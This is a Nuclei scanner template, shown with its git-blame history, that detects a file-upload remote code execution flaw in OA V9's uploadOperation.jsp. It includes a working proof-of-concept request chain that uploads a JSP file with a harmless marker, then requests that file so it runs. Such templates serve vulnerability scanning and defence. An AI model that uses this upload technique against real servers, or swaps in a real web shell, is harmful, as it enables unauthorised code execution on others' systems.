nuclei-templates/vulnerabilities/other/oa-v9-uploads-file.yaml

id: oa-v9-uploads-file

info:
  name: OA V9 RCE via File Upload
  author: pikpikcu
  severity: high
  description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  tags: rce,jsp

requests:
  - raw:
      - |
        POST /page/exportImport/uploadOperation.jsp HTTP/1.1
        Host: {{Hostname}}
        Origin: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo

        ------WebKitFormBoundaryFy3iNVBftjP6IOwo
        Content-Disposition: form-data; name="file"; filename="poc.jsp"
        Content-Type: application/octet-stream

        <%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
        ------WebKitFormBoundaryFy3iNVBftjP6IOwo--

      - |
        GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
          - 'status_code_2 == 200'
        condition: and
Create oa-v9-uploads-file.yaml 2021-04-13 07:06:02 +00:00			`id: oa-v9-uploads-file`

			`info:`
Update oa-v9-uploads-file.yaml 2021-05-10 07:53:08 +00:00			`name: OA V9 RCE via File Upload`
Create oa-v9-uploads-file.yaml 2021-04-13 07:06:02 +00:00			`author: pikpikcu`
			`severity: high`
It is not just a file upload 2021-05-10 06:35:10 +00:00			`description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g`
matcher improvements 2021-04-13 20:23:24 +00:00			`tags: rce,jsp`
Create oa-v9-uploads-file.yaml 2021-04-13 07:06:02 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /page/exportImport/uploadOperation.jsp HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo`

			`------WebKitFormBoundaryFy3iNVBftjP6IOwo`
			`Content-Disposition: form-data; name="file"; filename="poc.jsp"`
			`Content-Type: application/octet-stream`

			`<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>`
			`------WebKitFormBoundaryFy3iNVBftjP6IOwo--`

			`- \|`
			`GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1`
			`Host: {{Hostname}}`

matcher improvements 2021-04-13 20:23:24 +00:00			`req-condition: true`
Create oa-v9-uploads-file.yaml 2021-04-13 07:06:02 +00:00			`matchers:`
matcher improvements 2021-04-13 20:23:24 +00:00			`- type: dsl`
			`dsl:`
			`- 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'`
			`- 'status_code_2 == 200'`
			`condition: and`